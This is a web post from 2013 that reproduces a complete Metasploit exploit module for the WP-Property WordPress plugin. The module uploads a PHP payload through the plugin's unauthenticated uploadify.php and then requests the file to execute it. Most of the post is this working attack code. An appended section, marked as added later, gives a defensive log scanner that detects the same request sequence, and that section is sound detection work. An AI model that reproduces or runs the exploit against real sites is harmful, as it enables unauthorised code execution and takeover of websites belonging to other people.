
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
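A defender-side check for the request sequence the module above performs (a POST to uploadify.php, then a GET of a .php file in the same directory), added here as an example and not part of the original post. The log lines are constructed, and the `KNOWN_SCRIPTS` allowlist and the function names are assumptions made for the example.

```ruby
# Added example: flag access-log evidence of the upload-then-execute sequence
# against WP-Property's uploadify.php. Sample data below is constructed.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}i
KNOWN_SCRIPTS = %w[uploadify.php].freeze # assumption: adjust to the files the plugin ships

# Apache/nginx "combined" format: ip ident user [time] "METHOD path PROTO" status ...
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method],
    path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# Returns findings in log order:
#   :upload_post        - a POST to uploadify.php answered with 200
#   :dropped_script_hit - a request for an unexpected .php in that directory,
#                         severity :high if the same client uploaded earlier
def scan(lines)
  uploaders = {}
  findings = []
  lines.each do |line|
    e = parse_line(line)
    next unless e && e[:path] =~ UPLOADIFY_DIR
    file = File.basename(e[:path]).downcase
    if e[:method] == 'POST' && file == 'uploadify.php' && e[:status] == 200
      uploaders[e[:ip]] = true
      findings << { type: :upload_post, severity: :medium, ip: e[:ip], path: e[:path] }
    elsif file.end_with?('.php') && !KNOWN_SCRIPTS.include?(file)
      sev = uploaders[e[:ip]] ? :high : :medium
      findings << { type: :dropped_script_hit, severity: sev, ip: e[:ip], path: e[:path] }
    end
  end
  findings
end

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
  '198.51.100.7 - - [04/Jan/2013:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [04/Jan/2013:10:02:11 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"',
  '203.0.113.9 - - [04/Jan/2013:10:02:12 +0000] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"',
  '203.0.113.9 - - [04/Jan/2013:10:02:13 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/aBcDe.php HTTP/1.1" 200 0 "-" "-"'
].freeze

scan(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

A lone `:upload_post` finding is still worth review: the `folder` form field is supplied by the client, so the uploaded file may not land in the directory this check watches.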
